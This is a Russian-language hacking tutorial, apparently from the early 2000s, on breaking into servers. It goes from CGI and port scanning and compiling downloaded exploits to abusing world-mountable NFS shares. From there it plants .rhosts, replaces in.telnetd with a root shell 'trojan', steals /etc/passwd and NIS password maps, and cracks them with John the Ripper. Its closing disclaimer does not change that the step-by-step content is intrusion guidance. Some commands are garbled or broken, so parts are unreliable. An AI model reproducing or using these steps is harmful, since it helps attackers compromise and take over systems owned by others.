Взлом сервера
C чего же всё таки начинать взлом сервера (сайта, странички и т.д.)
Итак, приступим! Первое с чего стоит начать это просканировать хост на стандартные CGi сценарии с помощью специальных сканеров которых слава богу сейчас предостаточно. Ну и что бы вы не потерялись в выборе могу посоветовать лучший (ИМХО) на сегодняшний день-это DCS-D@mned Cgi Scanner предоставленный нам хак-группой D@mnedr, его можно скачать с йх официального сайта wwwcc.f2s.com, еще правда есть сканер от груааы Void (wwwvoid.ru) Но он немного уступает DCS по скорости сканирования. Ок, дальше, сканнер нашел уязвимый скрипт и вы спросите что же делать дальше???, а дальше вам надо найти то как использовать этот эксплоит, я дам вам несколько
ссылок где можно найти описание этих ошибок:
qwerty.nanko.ru (наиболее полный но на Английском)
wwwvoid.ru
wwwhack-crack.com
или вы можете просто зайти на один из следующих сайтов и просто ввести уязвимый скрипт в строке поиска:
wwwpacketstorm.securify.com
wwwsecurityfocus.com
wwwrootshell.com
Второе и пожалуй главное - это сканирование портов, для сканирования можно использовать любой сканнер портов(какой - на ваш выбор их сейчас везде полно), но опять же хотел бы обратить ваше внимание на сканнер Nscan который можно скачать тут wwwnscan.hypermart.net, этот сканер обладает просто потрясающей скоростью сканирования и довольно просто в управлении(правда на сайте лежит Shareware версия которая будет работать только 30 дней)
После того как сканер нашел открытые порты вам надо приконнектиться к каждому и посмотреть какая версия программного обеспечения установлена на нём, делается это с помощью клиента TELNET который есть даже в Вынь95 (98,2000), в командной строке TELNET вы пишете:
telnet>open wwwtarget.com
и смотрите версию софта например: WU-FTPD 2.6.0(1) Sendmail QPOP IMAP и тд. После того как вы посмотрели версию вы должны найти эксплоит под эту версию, идете опять же на:
wwwsecurityfocus.com
wwwpacketstorm.securify.com
wwwtechnotronic.com
и вводите в строке поиска название программы и его версию.
После того как вы скачали эксплоит его как правило надо скомпилировать - то есть привести к рабочему состоянию (как правило) так как большинство серверов в сети висит на *NIX то есть ЮНИКС ЛИНУКС ИРИКс и тд, то и компилировать его надо под этими системами. Если у вас нет установленного ЮНИКСА, то вам в любом случае (если хотите чего ни будь ломать нужен Юникс Шелл, то есть оболочка Юникс). Бесплатно её можно получить на wwwnether.net и тому подобных серверах (введите на любом поисковике UNIX+SHELL+FREE)
Когда шелл получен и эксплоит скачен то можно приступать к компилированию, обычно эксплоит (в большинстве случаев) это программа на языке С, для компиляции будем использовать компилятор GCC, итак в командной строке оболочки пишем:
gcc -o exploit exploit.c и нижимаем Enter.
Хочу так же заметить что программы в Юникс подобный системах запускаются с "./"+имя программы, в нашем случае эксплоит будет запускаться:
>./exploit
Третье, еще один довольно популярный взлом системы это проверка на расшаренные папки, в Юникс то можно проверить с помощью утилиты showmount, итак из оболочки запускаем showmount:
>showmount -e wwwtarget.com
и видим
/user/ Everyone
или что-то другое но если есть Everyone то значит папка открыта на монтирование для всех дальше пишем
>mount -t nfs target.remote.com:/user /mnt
потом переходми в каталог cd /mnt/home и устанавливаем .rhosts
>echo wwwtarget.com user/.rhosts
дальше делаем следующее:
>cat /etc/passwd
user::257:20:: / : -(уберите пробелы между : / : ) смотрим пользователя и создаем такого же у нас(если возможно)
> su - user
! Становимся им
$ rsh target.remote.com /bin/csh -i
Warning! No access to terminal, job control disabled!
! И заходим на удаленную машину
% id
uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys)
% ls -ldg /usr/etc
! Каталог доступен на запись
drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc
% grep telnet /etc/inetd.conf
telnet stream nowait root /usr/etc/in.telnetd in.telnetd
! Нашли программу, которая запустится
!под root"ом из нашего каталога
% cd /usr/etc
% mv in.telnetd in.telnetd1
! создаем троянского коня
% cat in.telnetd
>!/bin/sh
exec /bin/csh -i
% chmod 755 in.telnetd
! и запускаем его
% telnet 127.1
Connecting 127.1.
Warning! No access to terminal, job control disabled!
> chown user /etc;
! Делаем /etc своим
: command not found
> exit;
: command not found
Connection closed by foreign host.
> cd /etc
После того как у нас есть файл с паролями вы берете расшифровщик паролей Юникс - John The Ripper запускаете его и ждете пока расшифруются пароли потом из шелла коннектитесь на 23 порт и вводите логин с паролем и все вы в системе!
И последнее на что я бы хотел обратить внимание в этой статье это проверка NIS сервера. Из облочки запускаем
>rpcinfo -p wwwtarget.com | grep bind и если видим что-то типа
120000 2 udp 2493 ypbind
То пробуем сдлать следующее:
>ypx -o target.passwd -g target.remote.com
Берём файл с паролями и запускаем подборщик.
На этом все!
Эта статья предназначена только для ознакомительных целей. Ни в коем случае не реализовывайте на практике то, что Вы прочитаете, так как Вы несете полную ответственность за свои поступки в соответствии с действующим законодательством. Я не отвечаю за достоверность информации и не несу ответственности за Ваши поступки! Все что вы делаете, вы делаете на свой страх и риск!!!